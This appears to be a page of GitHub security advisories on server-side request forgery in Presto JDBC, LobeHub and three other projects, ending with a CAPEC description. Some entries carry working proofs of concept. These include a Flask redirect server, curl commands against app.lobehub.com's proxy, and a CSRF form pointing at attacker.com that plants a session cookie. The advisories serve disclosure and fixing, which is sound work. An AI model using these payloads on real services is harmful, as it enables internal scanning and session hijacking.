Regarding the fix suggestions, the redirect issue we can consider directly disable the following redirect. If not, we can add a jdbc parameter such as allowRedirect. Like MySQL JDBC caused arbitrary file reading before, its solution is adding the allowLoadLocalInfile parameters. Disable redirect by default, and there is a need to open. The nextUri issue is similar. If we can only take the path of nextUri instead of the complete URL, join the host and path. If not, add a jdbc parameter too.

I think these two vulnerabilities are worth fixing. There is no effective way to avoid this vulnerability at the server side, and the only way to fix them is modifying the jdbc source code. I think many other vendors also have this issue.

I hope to apply for CVEs and give security thanks in the vulnerability bulletin to prove my work, thank you.

Vulnerability Discovery Credit: Jianyu Li @ WuHeng Lab of ByteDance

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.facebook.presto:presto-jdbc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.283"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-03T21:54:02Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nPresto JDBC is vulnerable to Server-Side Request Forgery (SSRF) when connecting a remote Presto server. An attacker can construct a redirect response that Presto JDBC client will follow and view sensitive information from highly sensitive internal servers or perform a local port scan. \n\n### Details\n\nPresto JDBC client uses OkHttp to send `POST /v1/statement` and `GET /v1/info` requests to the remote Presto server. And OkHttp will follow 301 and 302 redirect by default. In addition, JDBC will manually follow 307 and 308 redirect. Therefore, if a malicious server returns a 30x redirect,  JDBC client will follow the redirect and cause SSRF.\n\nFor unexpected responses, JDBC will put the response body into the error. So the response of the internal server will be leaked if the server also returns the error directly to the user.\n\nThe relevant code is in file path `/presto-client/src/main/java/com/facebook/presto/client/StatementClientV1.java` and function `StatementClientV1` .\n\nThe flowchart is as follows:\n\n\u003cimg src=\"https://s2.loli.net/2023/09/18/AhiHNL5neuYIK4X.png\" alt=\"trino_jdbc_ssrf_1.png\" style=\"zoom:50%;\" /\u003e\n\n### PoC\n\nRunning an HTTP service to route POST /v1/statement redirect to the intranet. For example, using these Python code:\n\n```python\nfrom flask import Flask, redirect\n\napp = Flask(__name__)\n\n@app.route(\u0027/v1/statement\u0027, methods=[\u0027POST\u0027])\ndef redirect_to_interal_server():\n    return redirect(\u0027http://127.0.0.1:8888\u0027, code=302)\n\nif __name__ == \u0027__main__\u0027:\n    app.run(host=\"0.0.0.0\",port=8000)\n```\n\nConnecting to the malicious server using JDBC:\n\n```java\nString url = \"jdbc:presto://\u003cip\u003e:\u003cport\u003e\";\nProperties properties = new Properties();\nproperties.setProperty(\"user\", \"root\");\ntry {\n    Connection connection = DriverManager.getConnection(url, properties);\n    Statement stmt = connection.createStatement();\n    ResultSet res = stmt.executeQuery(\"show catalogs\");\n    while(res.next()) {\n        System.out.println(res.getString(1));\n    }\n} catch (Exception e) {\n    e.printStackTrace();\n}\n```\n\nPwned!\n\n### Impact\n\nWhen the target remote Presto server to be connected is controllable,  an attacker can view sensitive information from highly sensitive internal servers or perform a local port scan. \n\n### Others\n\nRegarding the fix suggestions, the redirect issue we can consider directly disable the following redirect. If not, we can add a jdbc parameter such as allowRedirect. Like MySQL JDBC caused arbitrary file reading before, its solution is adding the allowLoadLocalInfile parameters. Disable redirect by default, and there is a need to open. The nextUri issue is similar. If we can only take the path of nextUri instead of the complete URL, join the host and path. If not, add a jdbc parameter too.\n\nI think these two vulnerabilities are worth fixing. There is no effective way to avoid this vulnerability at the server side, and the only way to fix them is modifying the jdbc source code. I think many other vendors also have this issue.\n\nI hope to apply for CVEs and give security thanks in the vulnerability bulletin to prove my work, thank you.\n\nVulnerability Discovery Credit: Jianyu Li @ WuHeng Lab of ByteDance",
  "id": "GHSA-xm7x-f3w2-4hjm",
  "modified": "2023-10-03T21:54:02Z",
  "published": "2023-10-03T21:54:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/prestodb/presto/security/advisories/GHSA-xm7x-f3w2-4hjm"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/prestodb/presto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Presto JDBC Server-Side Request Forgery by redirect"
}

GHSA-XMG6-QG4M-GW97

Vulnerability from github – Published: 2025-03-05 15:30 – Updated: 2025-03-05 15:30
VLAI
Details

JizhiCMS v2.5.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the component \c\PluginsController.php. This vulnerability allows attackers to perform an intranet scan via a crafted request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-25785"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-26T15:15:26Z",
    "severity": "CRITICAL"
  },
  "details": "JizhiCMS v2.5.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the component \\c\\PluginsController.php. This vulnerability allows attackers to perform an intranet scan via a crafted request.",
  "id": "GHSA-xmg6-qg4m-gw97",
  "modified": "2025-03-05T15:30:50Z",
  "published": "2025-03-05T15:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25785"
    },
    {
      "type": "WEB",
      "url": "https://www.jizhicms.cn"
    },
    {
      "type": "WEB",
      "url": "http://jizhicms.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XMM3-9X39-98R5

Vulnerability from github – Published: 2026-03-27 15:30 – Updated: 2026-03-28 00:31
VLAI
Details

A weakness has been identified in mingSoft MCMS 迄 5.5.0. This issue affects the function catchImage of the file net/mingsoft/cms/action/BaseAction.java of the component Editor Endpoint. Executing a manipulation of the argument catchimage can lead to server-side request forgery. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-4953"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-27T15:17:02Z",
    "severity": "MODERATE"
  },
  "details": "A weakness has been identified in mingSoft MCMS \u8fc4 5.5.0. This issue affects the function catchImage of the file net/mingsoft/cms/action/BaseAction.java of the component Editor Endpoint. Executing a manipulation of the argument catchimage can lead to server-side request forgery. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks.",
  "id": "GHSA-xmm3-9x39-98r5",
  "modified": "2026-03-28T00:31:13Z",
  "published": "2026-03-27T15:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4953"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wing3e/public_exp/issues/3"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.353831"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.353831"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.777516"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XMMP-7836-3M8W

Vulnerability from github – Published: 2023-09-28 00:30 – Updated: 2024-04-04 07:56
VLAI
Details

An issue in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the reque parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41449"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-27T23:15:11Z",
    "severity": "CRITICAL"
  },
  "details": "An issue in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the reque parameter.",
  "id": "GHSA-xmmp-7836-3m8w",
  "modified": "2024-04-04T07:56:20Z",
  "published": "2023-09-28T00:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41449"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/RNPG/c1ae240f2acec138132aa64ce3faa2e0"
    },
    {
      "type": "WEB",
      "url": "http://ajaxnewsticker.com"
    },
    {
      "type": "WEB",
      "url": "http://phpkobo.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XMWJ-C75X-6346

Vulnerability from github – Published: 2026-06-16 20:15 – Updated: 2026-06-16 20:15
VLAI
Summary
LobeHub: Unauthenticated SSRF in `/webapi/proxy`
Details

Unauthenticated SSRF in /webapi/proxy allows anyone to proxy requests and inject cookies on lobehub.com

Summary

The /webapi/proxy endpoint on app.lobehub.com accepts a URL in the POST body and fetches it server-side without any authentication. This is the same proxy code that was vulnerable in CVE-2024-32964, where /api/proxy was fixed by adding auth middleware. The /webapi/proxy route was never secured — it is the only webapi route missing the checkAuth() wrapper. An attacker can use this to make arbitrary outbound requests from LobeHub's infrastructure, leak Vercel deployment details, and inject cookies on the lobehub.com domain through reflected Set-Cookie headers.

Vulnerability Details

Type: Server-Side Request Forgery (CWE-918) Affected Endpoint: POST /webapi/proxy Vulnerable File: src/app/(backend)/webapi/proxy/route.ts

The route handler reads a URL from the request body and passes it to ssrfSafeFetch() without calling checkAuth() first. Every other webapi route (/webapi/chat/*, /webapi/models/*, /webapi/create-image/*) wraps the handler in checkAuth(), but the proxy does not. The Next.js middleware also skips /webapi/ routes — defaultMiddleware() calls NextResponse.next() for any path starting with /webapi/, so neither the route handler nor the middleware performs authentication.

Steps to Reproduce

Fetch an external URL through the proxy (no auth, no cookies, no tokens):

curl -X POST -H "Content-Type: text/plain;charset=UTF-8" \
  -d "https://httpbin.org/ip" \
  "https://app.lobehub.com/webapi/proxy"

image

Response:

{"origin": "3.14.141.44"}

This is the IP of LobeHub's Vercel serverless function. The proxy fetched httpbin.org and returned the full response body.

Inject a cookie on the lobehub.com domain:

curl -D- -X POST -H "Content-Type: text/plain;charset=UTF-8" \
  -d "https://httpbin.org/response-headers?Set-Cookie=__session%3Dmalicious%3BPath%3D%2F%3BDomain%3Dlobehub.com%3BSecure%3BHttpOnly" \
  "https://app.lobehub.com/webapi/proxy"

The response headers include:

set-cookie: __session=malicious;Path=/;Domain=lobehub.com;Secure;HttpOnly

image

The proxy passes upstream response headers straight through (only stripping Content-Encoding and Content-Length). An attacker controls the upstream server, so they control which Set-Cookie headers are reflected. The __session and __clerk_db_jwt cookies are both injectable — these are the cookie names used by Clerk for authentication.

CSRF to cookie injection (no user interaction beyond visiting a page):

An attacker hosts the following HTML. When a victim opens it, the browser submits a form to the proxy, which fetches the attacker's server. The attacker's server responds with a Set-Cookie header, and the proxy reflects it. The victim's browser sets the cookie on lobehub.com because the response comes from app.lobehub.com.

<form id=f action="https://app.lobehub.com/webapi/proxy"
  method=POST enctype="text/plain">
  <input name="https://attacker.com/inject?x" value="">
</form>
<script>f.submit()</script>

The attacker's server at /inject?x= responds with Set-Cookie: __session=KNOWN_VALUE; Path=/; Domain=lobehub.com; Secure; HttpOnly. The proxy reflects this header and the victim's browser stores the cookie.

Impact

The proxy is fully unauthenticated and returns the complete response from any external URL. I confirmed the following on app.lobehub.com:

An attacker can inject authentication cookies (__session, __clerk_db_jwt, __client_uat) on the lobehub.com domain by chaining CSRF with the proxy's reflected Set-Cookie headers. If LobeHub uses Clerk for session management, this is a session fixation vector — the attacker sets a known session value before the victim logs in, then uses that same value to access the victim's session.

The proxy also leaks Vercel infrastructure details. The Traceparent and X-Vercel-Id headers from internal request tracing appear in every proxied response. The server's egress IP is exposed. Vercel Edge Config and the Vercel API are both reachable through the proxy (they return auth errors, not SSRF blocks), which means the proxy reaches Vercel's management plane.

The endpoint has no rate limiting. An attacker can use LobeHub's infrastructure as an anonymous proxy for scanning, phishing, or abusing IP-based trust relationships with third-party services.

Recommended Fix

Add checkAuth() to the proxy route, matching every other webapi route:

- export const POST = async (req: Request) => {
+ export const POST = checkAuth(async (req, { userId }) => {

If the proxy is only needed for client-side URL previews, consider removing the endpoint entirely and handling previews in the browser.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.56"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@lobehub/lobehub"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.57"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54157"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T20:15:57Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Unauthenticated SSRF in /webapi/proxy allows anyone to proxy requests and inject cookies on lobehub.com\n\n## Summary\n\nThe `/webapi/proxy` endpoint on app.lobehub.com accepts a URL in the POST body and fetches it server-side without any authentication. This is the same proxy code that was vulnerable in CVE-2024-32964, where `/api/proxy` was fixed by adding auth middleware. The `/webapi/proxy` route was never secured \u2014 it is the only webapi route missing the `checkAuth()` wrapper. An attacker can use this to make arbitrary outbound requests from LobeHub\u0027s infrastructure, leak Vercel deployment details, and inject cookies on the `lobehub.com` domain through reflected `Set-Cookie` headers.\n\n## Vulnerability Details\n\n**Type:** Server-Side Request Forgery (CWE-918)\n**Affected Endpoint:** POST /webapi/proxy\n**Vulnerable File:** `src/app/(backend)/webapi/proxy/route.ts`\n\nThe route handler reads a URL from the request body and passes it to `ssrfSafeFetch()` without calling `checkAuth()` first. Every other webapi route (`/webapi/chat/*`, `/webapi/models/*`, `/webapi/create-image/*`) wraps the handler in `checkAuth()`, but the proxy does not. The Next.js middleware also skips `/webapi/` routes \u2014 `defaultMiddleware()` calls `NextResponse.next()` for any path starting with `/webapi/`, so neither the route handler nor the middleware performs authentication.\n\n## Steps to Reproduce\n\n**Fetch an external URL through the proxy (no auth, no cookies, no tokens):**\n\n```\ncurl -X POST -H \"Content-Type: text/plain;charset=UTF-8\" \\\n  -d \"https://httpbin.org/ip\" \\\n  \"https://app.lobehub.com/webapi/proxy\"\n```\n\u003cimg width=\"1069\" height=\"297\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4fa7ffe9-fe4f-4752-875a-cb3fa79c3c18\" /\u003e\n\nResponse:\n\n```json\n{\"origin\": \"3.14.141.44\"}\n```\n\nThis is the IP of LobeHub\u0027s Vercel serverless function. The proxy fetched httpbin.org and returned the full response body.\n\n**Inject a cookie on the lobehub.com domain:**\n\n```\ncurl -D- -X POST -H \"Content-Type: text/plain;charset=UTF-8\" \\\n  -d \"https://httpbin.org/response-headers?Set-Cookie=__session%3Dmalicious%3BPath%3D%2F%3BDomain%3Dlobehub.com%3BSecure%3BHttpOnly\" \\\n  \"https://app.lobehub.com/webapi/proxy\"\n```\n\nThe response headers include:\n\n```\nset-cookie: __session=malicious;Path=/;Domain=lobehub.com;Secure;HttpOnly\n```\n\u003cimg width=\"1215\" height=\"340\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f0710685-edb8-4cc9-8162-27f0ba911903\" /\u003e\n\nThe proxy passes upstream response headers straight through (only stripping `Content-Encoding` and `Content-Length`). An attacker controls the upstream server, so they control which `Set-Cookie` headers are reflected. The `__session` and `__clerk_db_jwt` cookies are both injectable \u2014 these are the cookie names used by Clerk for authentication.\n\n**CSRF to cookie injection (no user interaction beyond visiting a page):**\n\nAn attacker hosts the following HTML. When a victim opens it, the browser submits a form to the proxy, which fetches the attacker\u0027s server. The attacker\u0027s server responds with a `Set-Cookie` header, and the proxy reflects it. The victim\u0027s browser sets the cookie on `lobehub.com` because the response comes from `app.lobehub.com`.\n\n```html\n\u003cform id=f action=\"https://app.lobehub.com/webapi/proxy\"\n  method=POST enctype=\"text/plain\"\u003e\n  \u003cinput name=\"https://attacker.com/inject?x\" value=\"\"\u003e\n\u003c/form\u003e\n\u003cscript\u003ef.submit()\u003c/script\u003e\n```\n\nThe attacker\u0027s server at `/inject?x=` responds with `Set-Cookie: __session=KNOWN_VALUE; Path=/; Domain=lobehub.com; Secure; HttpOnly`. The proxy reflects this header and the victim\u0027s browser stores the cookie.\n\n## Impact\n\nThe proxy is fully unauthenticated and returns the complete response from any external URL. I confirmed the following on app.lobehub.com:\n\nAn attacker can inject authentication cookies (`__session`, `__clerk_db_jwt`, `__client_uat`) on the `lobehub.com` domain by chaining CSRF with the proxy\u0027s reflected `Set-Cookie` headers. If LobeHub uses Clerk for session management, this is a session fixation vector \u2014 the attacker sets a known session value before the victim logs in, then uses that same value to access the victim\u0027s session.\n\nThe proxy also leaks Vercel infrastructure details. The `Traceparent` and `X-Vercel-Id` headers from internal request tracing appear in every proxied response. The server\u0027s egress IP is exposed. Vercel Edge Config and the Vercel API are both reachable through the proxy (they return auth errors, not SSRF blocks), which means the proxy reaches Vercel\u0027s management plane.\n\nThe endpoint has no rate limiting. An attacker can use LobeHub\u0027s infrastructure as an anonymous proxy for scanning, phishing, or abusing IP-based trust relationships with third-party services.\n\n## Recommended Fix\n\nAdd `checkAuth()` to the proxy route, matching every other webapi route:\n\n```diff\n- export const POST = async (req: Request) =\u003e {\n+ export const POST = checkAuth(async (req, { userId }) =\u003e {\n```\n\nIf the proxy is only needed for client-side URL previews, consider removing the endpoint entirely and handling previews in the browser.",
  "id": "GHSA-xmwj-c75x-6346",
  "modified": "2026-06-16T20:15:57Z",
  "published": "2026-06-16T20:15:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xmwj-c75x-6346"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lobehub/lobehub"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LobeHub: Unauthenticated SSRF in `/webapi/proxy`"
}

No mitigation information available for this CWE.

CAPEC-664: Server Side Request Forgery

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.